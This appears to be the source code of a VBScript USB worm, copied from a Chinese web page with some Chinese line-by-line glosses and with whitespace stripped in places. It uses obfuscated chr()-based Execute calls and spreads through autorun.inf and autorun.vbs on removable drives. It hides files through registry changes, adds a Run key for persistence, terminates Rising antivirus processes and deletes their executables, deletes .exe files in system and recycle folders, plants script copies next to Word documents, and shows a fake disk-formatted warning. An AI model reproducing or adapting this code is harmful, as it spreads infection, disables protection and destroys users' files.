remvbs.rhl
Dimfs,r,ss,w,reg,regpath,dvbs
ddd="Setfs="&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&"Scrip"&chr(116)&"ing.File"&chr(83)&"yste"&chr(109)&chr(79)&"bject"&chr(34)&chr(41)
Executeddd
rrr="setr="&chr(119)&"scri"&"pt."&chr(67)&"reate"&"Obj"&chr(101)&"c"&chr(116)&chr(40)&chr(34)&chr(119)&"scri"&"pt."&chr(115)&"he"&chr(108)&chr(108)&chr(34)&chr(41)
Executerrr
sss="fs."&chr(103)&"etfil"&chr(101)&chr(40)&chr(119)&"scri"&"pt."&"scri"&chr(112)&"tfull"&chr(110)&"ame"&chr(41)
ttt="setdvbs="&sss
Executettt
r.run(fs.GetSpecialFolder(0)&"explorer.exe.")
main()
OnErrorResumeNext
submain()
regtime()
finddrive()
countdrive(ss)
regwrite()
ganranfile(ss)
xunhuan()
endsub
Functionfinddrive()
ifdvbs.name="USBDRIVE.dll"then
regwrite()
ganrandisk()
endif
ifdvbs.name<>"autorun.vbs"anddvbs.name<>"USBDRIVE.dll"then
regwrite()
dvbs.delete(true)
endif
ss=Trim("")
Setdc=fs.Drives
ForEachdIndc
Ifd.DriveType=1ord.DriveType=2andd.IsReadyThen
ss=ss&d.DriveLetter
endif
Next
ss=StrReverse(LCase(Trim(ss)))
endFunction
Functioncountdrive(ss)
OnErrorResumeNext
dimx
Fori=1ToLen(ss)
x=Mid(ss,i,1)
ifx=""then
x=Mid(ss,1,1)
i=1
endif
Setw=fs.GetDrive(x)
ganrandiskroot()
Next
endFunction
Functionganrandiskroot()
dimc,s,f,vbc,ts,runreg
OnErrorResumeNext
Ifw.DriveType=2orw.DriveType=1andw.IsReadyThen
Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then
else
fff=sss&".copy("&chr(34)&fs.GetSpecialFolder(1)&"USBDRIVE.dll"&chr(34)&")"
Executefff
Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then
else
fff=sss&".copy("&chr(34)&"D:SystemVolumeInformationUSBDRIVE.dll"&chr(34)&")"
Executefff
iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then
Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":doc.reg")
f.attributes=f.attributes+7
endif
endif
endif
Iffs.FileExists(w.DriveLetter&":autorun.vbs")Then
Setc=fs.opentextfile(w.DriveLetter&":autorun.vbs",1)
vbc=c.readall
IfInStr(vbc,"vbs.rhl")<>0Then
c.Close
Else
c.Close
Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")
c.delete(true)
fff=sss&".copy("&chr(34)&w.DriveLetter&":autorun.vbs"&chr(34)&")"
Executefff
s=Array("2007总结病毒","这是病毒","违纪病毒","检查病毒","黑名单病毒","没有发出的病毒","恋爱的病毒(病毒)")
Randomize
i=Int((6*Rnd)+1)
fff=sss&".copy("&chr(34)&w.DriveLetter&":"&s(i)&".vbs"&chr(34)&")"
Executefff
Setb=fs.GetFile(w.DriveLetter&":"&s(i)&".vbs")
b.attributes=b.attributes-b.attributes
Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")
c.attributes=c.attributes+7
Iffs.FileExists(w.DriveLetter&":vbs.reg")orfs.FileExists(w.DriveLetter&":doc.reg")Then
else
ifw.DriveLetter="C"then
Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(fs.GetSpecialFolder(1)&"vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"doc.reg")
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(fs.GetSpecialFolder(1)&"doc.reg")
f.attributes=f.attributes+7
else
Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":doc.reg")
f.attributes=f.attributes+7
endif
endif
endif
else
fff=sss&".copy("&chr(34)&w.DriveLetter&":autorun.vbs"&chr(34)&")"
Executefff
s=Array("检查病毒","2007总结病毒","违纪病毒","这是病毒","黑名单","没有发出的病毒","恋爱的病毒(病毒)")
Randomize
i=Int((6*Rnd)+1)
fff=sss&".copy("&chr(34)&w.DriveLetter&":"&s(i)&".vbs"&chr(34)&")"
Executefff
Setb=fs.GetFile(w.DriveLetter&":"&s(i)&".vbs")
b.attributes=b.attributes-b.attributes
Setc=fs.GetFile(w.DriveLetter&":autorun.vbs")
c.attributes=c.attributes+7
Iffs.FileExists(w.DriveLetter&":vbs.reg")orfs.FileExists(w.DriveLetter&":doc.reg")Then
else
ifw.DriveLetter="C"then
Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(fs.GetSpecialFolder(1)&"vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(fs.GetSpecialFolder(1)&"doc.reg")
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(fs.GetSpecialFolder(1)&"doc.reg")
f.attributes=f.attributes+7
else
Setts=fs.CreateTextFile(w.DriveLetter&":vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(w.DriveLetter&":doc.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":doc.reg")
f.attributes=f.attributes+7
endif
endif
endif
Iffs.FileExists(w.DriveLetter&":autorun.inf")Then
Setc=fs.opentextfile(w.DriveLetter&":autorun.inf",1)
vbc=c.readall
IfInStr(vbc,"WScript.exe.autorun.vbs")<>0Then
c.Close
Else
Setf=fs.GetFile(w.DriveLetter&":autorun.inf")
f.attributes=f.attributes-f.attributes
Setts=f.OpenAsTextStream(2,-2)
ts.WriteLine"[AutoRun]"
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shellopen=打开(&O)"
ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"
ts.WriteLine"shellopenDefault=1"
ts.close
f.attributes=f.attributes+7
endif
else
Setts=fs.CreateTextFile(w.DriveLetter&":autorun.inf",true)
ts.WriteLine"[AutoRun]"
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shellopen=打开(&O)"
ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"
ts.WriteLine"shellopenDefault=1"
ts.close
Setf=fs.GetFile(w.DriveLetter&":autorun.inf")
f.attributes=f.attributes+7
EndIf
endif
endFunction
Functionregwrite()
OnErrorResumeNext
dims
a1="HKE"&"Y_CUR"&"RENT_US"&"ERSoft"&"wareMi"&"croso"&"ftWin"&"dowsCur"&"rentV"&"ersionExp"&"lorerAd"&"vanced"(a1=HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
a2="HK"&"EY_CLAS"&"SES_RO"&"OTDLL"&"File"(a2=HKEY_CLASSES_ROOTDLLFile)
a3="HKEY"&"_LOCA"&"L_MACH"&"INESOFT"&"WAREMi"&"cros"&"oftWin"&"dowsCur"&"rentVer"&"sionpoli"&"ciesExpl"&"orerNoDr"&"iveTypeAutoRun"
(a3=HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerNoDriveTypeAutoRun)
a4="HKE"&"Y_CURR"&"ENT_USE"&"RSoftw"&"areMicr"&"osoftWi"&"ndowsCur"&"rentVersi"&"onPolici"&"esExplor"&"erNoDriveT"&"ypeAutoRun"
(a4=HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun)
a5="HK"&"EY_LO"&"CAL_MA"&"CHINESof"&"twareMi"&"croso"&"ftWind"&"owsCurre"&"ntVersi"&"onRu"&"nUSBDR"&"IVE.dll"
(a5=HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunUSBDRIVE.dll)
a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)e)
a7="HKE"&"Y_CLAS"&"SES_ROO"&"TVBSF"&"ileDefau"&"ltIcon"
(a7=HKEY_CLASSES_ROOTVBSFileDefaultIcon)
sets=fs.GetDrive(fs.GetDriveName(dvbs.path))
scandoc(fs.GetSpecialFolder(0)&"Installer")
ifreg="wordicon.exe"then
ifs="C:"then
iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationdoc.reg")
else
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"doc.reg")
endif
else
iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationdoc.reg")
else
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&s.DriveLetter&":doc.reg")
endif
endif
ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)®path&",1"&chr(34)
Executeppp
else
ifs="C:"then
iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationvbs.reg")
else
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&fs.GetSpecialFolder(1)&"vbs.reg")
endif
else
iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&"D:SystemVolumeInformationvbs.reg")
else
r.run(fs.GetSpecialFolder(1)&"dllcacheregedit.exe/s"&Space(3)&s.DriveLetter&":vbs.reg")
endif
endif
ppp=a6&Space(2)&chr(34)&a7&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"shell32.dll,1"&chr(34)
Executeppp
endif
ppp=a6&Space(2)&chr(34)&a1&"ShowSuperHidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)
Executeppp
ppp=a6&Space(2)&chr(34)&a1&"HideFileExt"&chr(34)&","&"1,"&chr(34)&"REG_DWORD"&chr(34)
Executeppp
ppp=a6&Space(2)&chr(34)&a1&"Hidden"&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)
Executeppp
ppp=a6&Space(2)&chr(34)&a2&"ScriptEngine"&chr(34)&","&chr(34)&"VBScript"&chr(34)
Executeppp
ppp=a6&Space(2)&chr(34)&a2&"ScriptHostEncode"&chr(34)&","&chr(34)&"{85131631-480C-11D2-B1F9-00C04F86C324}"&chr(34)
Executeppp
ppp=a6&Space(1)&chr(34)&a2&"ShellOpenCommand"&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"Wscript.exe"&Space(1)&chr(34)&chr(34)&"%1"&chr(34)&chr(34)&Space(1)&"%*"&chr(34)
Executeppp
ppp=a6&Space(2)&chr(34)&a2&"ShellExPropertySheetHandlersWSHProps"&chr(34)&","&chr(34)&"{60254CA5-953B-11CF-8C96-00AA00B8708C}"&chr(34)
Executeppp
ppp=a6&Space(2)&chr(34)&a3&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)
Executeppp
ppp=a6&Space(2)&chr(34)&a4&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)
Executeppp
iffs.FileExists("D:SystemVolumeInformationUSBDRIVE.dll")Then
ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&"D:SystemVolumeInformation"&"USBDR"&"IVE.dll"&chr(34)
Executeppp
else
ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&fs.GetSpecialFolder(1)&"USBDR"&"IVE.dll"&chr(34)
Executeppp
endif
ifday(date())="27"then(27号报告错误)
msgbox"小样!你的杀毐软件该升级了,磁盘已被格式化"
EndIf
endFunction
Functionscandoc(a)(定义子函数)
OnErrorResumeNext(出错不报告)
dimfiles,file,subfolder,folder_
setfolder_=fs.getfolder(a)
setfiles=folder_.files
foreachfileinfiles(foreach。。。next对数组或集合中的每个元素重复执行一组语句)
iffile.name="wordicon.exe"then
reg=file.name
regpath=file.path
exitFunction
endif
next(foreach的next)
setsubfolders=folder_.subfolders(set是一个赋值语句)
foreachsubfolderinsubfolders
scandoc(subfolder)
next
endFunction(结束子程序的定义)
Functionregtime()(定义一个子程序添加注册表,结束瑞星)
a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)echr(116)是值)
a8="HKE"&"Y_CUR"&"RENT_US"&"ERSoft"&"wareMicr"&"osoftWin"&"dowsScr"&"iptingHo"&"stSettin"&"gsTimeou(a8=注册表HKEY_CURRENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout)
ppp=a6&Space(2)&chr(34)&a8&chr(34)&","&"0,"&chr(34)&"REG_DWORD"&chr(34)
Executeppp(对指定的字符串执行正则表达式搜索)
dimNameorPID
kill=Array("RavMon.exe","RavTask.exe","RavStub.exe","RavMond.exe","RsAgent.exe")
fori=0to4
KillProcess(kill(i))(结束4个瑞星程序)
next
endFunction(结束这个子程序)
Functionganranfile(aa)(定义一个子程序)
OnErrorResumeNext(出错不报告)
dimx
Fori=1ToLen(aa)(len函数返回字符串内字符的数目,或是存储一变量所需的字节数)
x=Mid(aa,i,1)(mid函数从字符串中返回指定数目的字符。这里是一个个返回给X)
ifx=""then
x=Mid(aa,1,1)
i=1
endif
Setx=fs.GetDrive(x)
ifx.IsReadythen
scan(x)
else
xunhuan()
endif
Next
endFunction(结束本子程序,作用不明)
Functionscan(x)(定义子程序scan(a))
OnErrorResumeNext(出错不报告)
dimfiles,file,subfolder,folder_
setfolder_=fs.getfolder(x)
setfiles=folder_.files
foreachfileinfiles
s=file.path
ext=fs.GetExtensionName(file)
ext=lcase(ext)(lcase函数返回字符串的小写形式)
ifext="doc"then
fff=sss&".copy("&chr(34)&mid(s,1,len(s)-3)&"vbs"&chr(34)&")"(fff是sss.copy加几个字符
怀疑这个几个字符组成一个文件名)
Executefff
endif
next
setsubfolders=folder_.subfolders
foreachsubfolderinsubfolders
scan(subfolder)
next
endFunction
Functionganrandisk()
OnErrorResumeNext
regwrite()
dimdoc,d,s,coun,w,h,oo
Setdoc=fs.Drives
foreachkindoc
ifk.IsReadythen
h=h&k.DriveLetter
endif
next
t1=len(Trim(h))
coun=doc.count
dowhilecoun>0
oo=h&w
clearinfo(oo)
wscript.sleep50
Setd=fs.Drives
ifd.count>counthen
foreachkind
ifk.IsReadythen
s=s&k.DriveLetter
endif
next
coun=d.count
t=StrReverse(LCase(Trim(s)))
w=mid(t,1,abs(len(t)-t1))
countdrive(w)
ganranfile(w)
s=trim("")
t1=len(t)
endif
ifd.count<counthen
foreachkind
ifk.IsReadythen
s=s&k.DriveLetter
endif
next
coun=d.count
t=StrReverse(LCase(Trim(s)))
s=trim("")
t1=len(t)
endif
loop
endFunction
Functionxunhuan()
OnErrorResumeNext
dimsfo
setsfo=fs.GetDrive(fs.GetDriveName(dvbs.path))
ifdvbs.name="autorun.vbs"ordvbs.name="USBDRIVE.dll"then
ifsfo.DriveType=2then
ganrandisk()
else
wscript.quit
endif
else
dvbs.delete(true)
endif
endFunction
Functionclearinfo(oo)
OnErrorResumeNext
dimdc,z
oo=LCase(Trim(oo))
Form=1ToLen(oo)
z=Mid(oo,m,1)
Setz=fs.GetDrive(z)
findinf(z)
v=Array(z.DriveLetter&":recycled",z.DriveLetter&":SystemVolumeInformation")
fori=0to1
scanexe(v(i))
next
next
vir=array(fs.GetSpecialFolder(1)&"recycled",fs.GetSpecialFolder(2),fs.GetSpecialFolder(0)&"system")
fori=0to2
scanexe(vir(i))
next
endFunction
Functionscanexe(a)
wscript.sleep100
OnErrorResumeNext
dimfiles,file,folder_
iffs.FolderExists(a)then
setfolder_=fs.getfolder(a)
setfiles=folder_.files
foreachfileinfiles
ext=fs.GetExtensionName(file)
ext=lcase(ext)
ifext="exe"then
Setf=fs.GetFile(file)
f.delete(true)
endif
next
setsubfolders=folder_.subfolders
foreachsubfolderinsubfolders
scanexe(subfolder)
next
endif
endFunction
Functionfindinf(z)
OnErrorResumeNext
Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then
else
fff=sss&".copy("&chr(34)&fs.GetSpecialFolder(1)&"USBDRIVE.dll"&chr(34)&")"
Executefff
Iffs.FileExists(fs.GetSpecialFolder(1)&"USBDRIVE.dll")Then
else
ppp=a6&Space(2)&chr(34)&a5&chr(34)&","&chr(34)&"D:SystemVolumeInformation"&"USBDR"&"IVE.dll"&chr(34)
Executeppp
endif
endif
Iffs.FileExists(z.DriveLetter&":autorun.vbs")Then
else
fff=sss&".copy("&chr(34)&z.DriveLetter&":autorun.vbs"&chr(34)&")"
Executefff
Setf=fs.GetFile(z.DriveLetter&":autorun.vbs")
f.attributes=f.attributes+7
endif
Iffs.FileExists(z.DriveLetter&":autorun.inf")Then
Setc=fs.opentextfile(z.DriveLetter&":autorun.inf",1)
vbc=c.readall
IfInStr(vbc,"WScript.exe.autorun.vbs")<>0Then
c.Close
Else
Setf=fs.GetFile(z.DriveLetter&":autorun.inf")
f.attributes=f.attributes-f.attributes
Setts=f.OpenAsTextStream(2,-2)
ts.WriteLine"[AutoRun]"(以下建立自动播放文件)
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shellopen=打开(&O)"
ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"
ts.WriteLine"shellopenDefault=1"
ts.close
f.attributes=f.attributes+7
endif
else
Setts=fs.CreateTextFile(z.DriveLetter&":autorun.inf",true)
ts.WriteLine"[AutoRun]"
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shellopen=打开(&O)"
ts.WriteLine"shellopenCommand=WScript.exe.autorun.vbs"
ts.WriteLine"shellopenDefault=1"
ts.close
Setf=fs.GetFile(z.DriveLetter&":autorun.inf")
f.attributes=f.attributes+7
EndIf
iffs.FileExists(z.DriveLetter&":vbs.reg")then
else
Setts=fs.CreateTextFile(z.DriveLetter&":vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(z.DriveLetter&":vbs.reg")
f.attributes=f.attributes+7
endif
iffs.FileExists(z.DriveLetter&":doc.reg")then
else
Setts=fs.CreateTextFile(z.DriveLetter&":doc.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoamMUICache]"
ts.WriteLinechr(34)&chr(64)&"C:WINDOWSSystem32wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(z.DriveLetter&":doc.reg")
f.attributes=f.attributes+7
endif
endFunction
FunctionKillProcess(NameorPID)
OnErrorResumeNext
DimoWMI,oProcs,oProc,strSQL
KillProcess=False
strSQL="SELECT*FROMWin32_Process"
IfNameOrPID<>""Then
IfIsNumeric(NameOrPID)Then
strSQL=strSQL&"WHEREHandle='"&NameorPID&"'"
Else
strSQL=strSQL&"WHEREName='"&NameorPID&"'"
EndIf
EndIf
SetoWMI=GetObject("winmgmts:.rootcimv2")
SetoProcs=oWMI.ExecQuery(strSQL)
ForEachoProcInoProcs
IfIsNumeric(NameOrPID)Then
oProc.Terminate
KillProcess=True
Else
oProc.Terminate
ifday(date())="27"then
setkillfile=fs.getfile(oProc.ExecutablePath)
killfile.delete(true)
EndIf
endif
Next
SetoProc=Nothing
SetoProcs=Nothing
SetoWMI=Nothing
EndFunction
【vbs病毒源文件】相关文章: